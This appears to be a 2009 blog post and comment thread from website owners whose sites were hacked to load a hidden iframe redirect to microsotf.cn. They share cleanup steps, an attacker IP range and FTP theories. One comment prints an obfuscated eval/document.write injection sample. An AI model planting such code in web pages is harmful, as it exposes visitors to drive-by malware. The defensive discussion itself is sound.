 |
 |
 |
 |
|
|
|
|
Website hack – microsotf.cn – WordPressSo I emerged from a fantastic vacation weekend to find all of my php sites not working. Each displaying the same simple error message: “Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING, expecting ‘,’ or ‘;’” After my initial 30 second panic attack subsided I did a little googling and came up with this site: http://www.geeked.info/web-site-hack-loading-microsotfcn/ I’m assuming this is a bot that crawls from site to site. I had websites hacked across three different servers. Once hacked, the site should produce a tiny iFrame that redirects to microsotf.cn. Don’t visit the page. It will most certainly ruin your day – spyware, malware, whatever. The beauty is – wordpress sites don’t display the iFrame. They just wind up broken. Other sites however won’t appear very different at all and it will be nearly impossible to tell whether the site was hacked or not. If you’re having this problem simply open the source of the page in question and look a block of code similar to this (either immediately following the body tag or at the very bottom of the source code.):  Delete the offending code – upload (backup the original first, just in case) and you’re back in business. Thanks to Ed over at http://www.geeked.info/ for having the ONLY blog post I could find on the whole internet about the hack. EDIT: 7/9/09 – It has happened again to one of my sites. Different block of code, different malware site being loaded – same basic poison/remedy. For those interested in learning how to block an ip address (or range of ip addresses) – click here. 8 Responses to “Website hack – microsotf.cn – WordPress”Leave a Reply |
I run a photography & design company with the very talented, very beautiful,Heather Swanner. (I also make legendary hot wings) 
|
Happened to me too. Thanks for posting this.
Happened to us also, 3 times!!!
We don’t know how they keep doing it either!!!
i did that – was ok for a week – now again been attacked by it … changed my FTP passwords and everything – how do u prevent this thing from attacking?
Contact your server administrator (in my case my shared hosting companies) and let them know what’s going on. If they’re even remotely worth doing business with they will investigate and block the offending ip address (91.212.198.37 ) or better yet, the entire range: 91.212.*.*
My host is awesome – Glitterhost – servers are some of the fastest in the US. The owner of the company returns phone calls personally, and they blocked that ip address for me within hours of my contacting them.
Cool – contacted host and advised them – thanks heaps for the I.P range was a great help … lets hope my host are as helpful.
Cheers
http://rockymountainenvironmental.com/
07/04/09 — 8:16am
Altered files: index.htm, index.html, default.asp, main.html
Offending Code: document.write(“‘);document.write(“‘);document.write(“”);
The Script failed to redirect due to conflict between my script call and my arguments. Repaired files 07/06/09 after discovery.
07/09/09 — 6:11AM
NEW OFFENDING CODE
eval(“d((*)&!o$^!%c$[[^@&um((*)&!e$[[^@&n[@&%^t.w$[[^@&r((*)&!i((*)&!t$^!%e(&@)&](‘(&@)&]‘$^!%)$[[^@&;[@&%^".replace(/\(\&\@\)\&\]|\$\^\!\%|\(\(\*\)\&\!|\$\[\[\^\@\&|\[\@\&\%\^/ig, ""))
This redirect bypassed my script calls and proceeded to download malware.
Malware: [braviax (fakealeart Trojan)]& [ID12 Undetermined self replicating virus]
I have closed down any server-side includes that are not necessary, changed passwords, and contacted Web.com to block IP as I as a client don’t have access or admin rights to .htaccess. Best of luck to all.
(Allen)
Happened to me too – 5 sites taken out. For the second time. If you don’t mind, what host are you using? I’m using 1and1.com. I’m wondering if there’s a commonality amongst us.
It’s been suggested from other sites in my research that they may be using your own ftp software by stealing your saved usernames and passwords. Not sure if that’s how they’re getting in to our servers so easy but it couldn’t hurt to save them in a separate encrypted file. Some also say that it doesn’t matter if you save them with the ftp client or not since they’ll grab them once you try and connect to your server and that the only safe way to transfer files is SSH.
I read about the ftp passwords. I don’t find that too hard to believe, but last night my Bludomain site was hacked again and I had THEM change my password the last time it happened, so I don’t think FTP passwords are the only way in.